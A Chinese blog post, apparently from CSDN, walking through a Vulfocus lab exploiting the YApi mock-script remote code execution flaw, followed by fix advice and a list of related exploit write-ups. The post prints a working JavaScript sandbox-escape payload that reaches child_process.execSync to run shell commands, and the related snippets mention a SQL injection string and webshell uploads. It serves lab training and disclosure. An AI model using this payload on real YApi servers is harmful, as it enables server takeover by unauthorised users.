[Vulfocus解题系列] yapi 代码执行

最新推荐文章于 2024-04-20 21:52:20 发布
最新推荐文章于 2024-04-20 21:52:20 发布
阅读量974 收藏 6
点赞数 2
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/118878989
版权

漏洞介绍

名称: yapi 代码执行

描述: API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。

解题过程

1.打开靶场页面,进入注册页面,随意注册一个用户
在这里插入图片描述
2.注册后进入如下页面
在这里插入图片描述
3.随意新建一个项目
在这里插入图片描述
4.随意添加一个接口
在这里插入图片描述
5.添加接口后如图所示
在这里插入图片描述
6.按图中所示依次点击
在这里插入图片描述
7.在脚本输入出输入poc,可以看出来ls /tmp所在的地方就是要执行的命令,如果要执行其他命令,修改ls /tmp即可。

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("ls /tmp && ps -ef").toString()

输入后点击保存
在这里插入图片描述
然后进入预览,点击预览地址
在这里插入图片描述
可以看到命令被成功执行,返回在预览页面上,获得flag
在这里插入图片描述

修复建议

1.关闭YAPI注册功能
2.删除恶意账户
3.回滚服务器快照
4.同步删除恶意mock脚本以防止二次攻击

00勇士王子
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
yapi 代码执行
qq_32445755的博客
07-04 1030
YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。因为大量用户使用 YAPI的默认配置并允许从外部网络访问YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。请拿到flag,默认在/tmp/目录中。漏洞复现步骤注册测试账号:注册登录后,创建一个项目,然后选择设置全局的mock脚本点击保存开启添加接口,然后再点击预览可以看到
Yapi命令执行漏洞复现
MrHatSec的博客
07-28 3922
YApi是高效、易用、功能强大的api管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护API,YApi还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。...
漏洞复现-yapi远程执行命令漏洞复现_yapi命令执行漏洞,硬核
2401_83947434的博客
04-20 970
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
实战 - YApi 接口管理平台 后台任意命令执行漏洞
HAKUNAMATATATTA的博客
04-23 615
YApi 接口管理平台 后台存在命令执行漏洞,攻击者通过发送特定的请求可执行任意命令获取服务器权限。
YApi远程代码执行
嘟的博客
07-09 906
一、漏洞说明: YApi是由去哪儿网开发开源的可视化平台,YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。 近日,互联网披露了YAPI远程代码执行0day漏洞,该漏洞已在野利用,并正在扩散。攻击者可利用该漏洞实现远程代码执行。建议用户通过临时防护措施缓解该漏洞风险,做好资产自查以及预
[Vulfocus解题] shiro 反序列化 (CVE-2016-4437)
m0_67401153的博客
04-11 619
解题过程: 1.打开靶场环境,进入首页 2.使用shiro反序列化工具执行命令 3.执行ls命令查看当前目录下存在什么文件 发现flag
啊~真香系列之 Yapi 浏览器扩展插件
03-17
Yapi 浏览器 扩展 官方
centos系统yapi离线安装包大全
01-24
centos系统yapi离线安装包大全,包含以下文件,已测试安装成功 - node-v12.13.0-linux-x64.tar.xz :nodejs离线...- yapi.tar:yapi执行程序 - pm2.tar.gz:nodejs程序管理工具(可选使用,后台直接启动vue项目也行)
YApi远程命令执行漏洞分析.pdf
最新发布
04-22
YApi远程命令执行漏洞分析.pdf
yapi:Docker for YApi 一键部署YApi
05-05
Docker for YApi 一键部署YApi JimCY [me@jinfeijie.cn] :warning:注意 :warning:注意:本仓库目前只支持安装,暂不支持升级,请知晓。如需升级请备份mongoDB内的数据。 使用 默认密码是:ymfe.org,安装成功后进入...
yapi离线安装包及环境
06-26
yapi离线安装信息
Yapi远程命令执行漏洞复现
Foreverlove112的博客
09-08 1285
Yapi远程命令执行漏洞复现
Yapi远程命令执行漏洞
weixin_46601374的博客
04-06 934
命令执行漏洞利用的条件? 攻击者可以控制eval函数的参数 【漏洞名称】 Yapi远程命令执行漏洞 【漏洞详情】 Yapi接口管理平台,使用Mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供服务。由于Mock脚本自定义服务未对JS脚本进行命令过滤,使用户可以添加任何请求处理脚本,攻击者可以利用该漏洞在受影响的服务器上执行任意js代码,最终接管并控制服务器。 【验证工具】 浏览器 首先注册一个平台账号,随便变就行,没人管是否正确 进去后创建一个项目 添加接口 .
手工SQL注入流程与常用语句_sql注入 手工(2),34岁网络安全开发大叔感慨
2401_83974173的博客
04-16 581
1’ and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)))# 通过修改limit后面数字一个一个爆表。
[Vulfocus解题系列] phpunit 远程代码执行 (CVE-2017-9841)
00勇士王子的博客
07-16 820
漏洞介绍 名称: phpunit 远程代码执行 (CVE-2017-9841) 描述: PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架。 通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。 漏洞版本 PHPUnit 4.8.19 ~ 4.8.27 PHPUnit 5.0.10 ~ 5.6.2 解题
Vulfocus解题复现】tomcat-pass-getshell 弱口令
温氏效应
11-15 3676
漏洞介绍 名称:Tomcat-pass-getshell 弱口令 描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat 2、拖动页面,找到war上传区域,上传jsp木马: 制作jsp木马,.
YApi分析从NoSQL注入到RCE远程命令执行.md
god_Zeo的安全博客
03-05 2168
YApi是一个可本地部署的、打通前后端及QA的、可视化的接口管理平台。YApi 是高效易用功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。在其1.12.0版本之前,存在一处NoSQL注入漏洞,通过该漏洞攻击者可以窃取项目Token,并利用这个Token执行任意Mock脚本,获取服务器权限。
YAPI远程执行漏洞复现
weixin_46580614的博客
08-02 322
YAPI远程执行漏洞复现 实验靶机 BUUCTF :题目 ezrce 漏洞详情 YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令
vulfocus nodejs-cve_2017_5941过程
qq_26692927的博客
04-23 1383
题目是清晰的,漏洞环境存在cve-2017-5941. 出现的问题:nc不能反弹shell【无 -e参数】、网上的nc 不使用 -e 反弹shell 不成功。 最后利用nodejs的反序列化成功反弹shell。 使用nodejsshell.py 生成POC:nodejsshell。 添加()后进行base64编码替换cookie,反弹shell /tmp/目录下寻找flag 不知道 ...
yapi 执行 npm run install-server 报错
04-03
这个错误可能有多种原因,以下是一些可能的解决方法: 1. 确认你已经安装了 Node.js 和 npm,并且它们的版本是最新的。 2. 检查你的 package.json 文件,确保你已经正确定义了 "scripts" 字段,并且 "install-server" 命令存在并且可执行。 3. 检查你的依赖项是否正确安装,如果没有,请尝试运行 npm install。 4. 如果你正在使用 Windows 操作系统,请尝试使用管理员权限运行命令行窗口,或者禁用防病毒软件。 5. 如果以上方法都没有解决问题,请尝试删除 node_modules 文件夹,并重新运行 npm install。 6. 如果还是有问题,可以尝试查看具体的错误信息,以便更好地排查问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值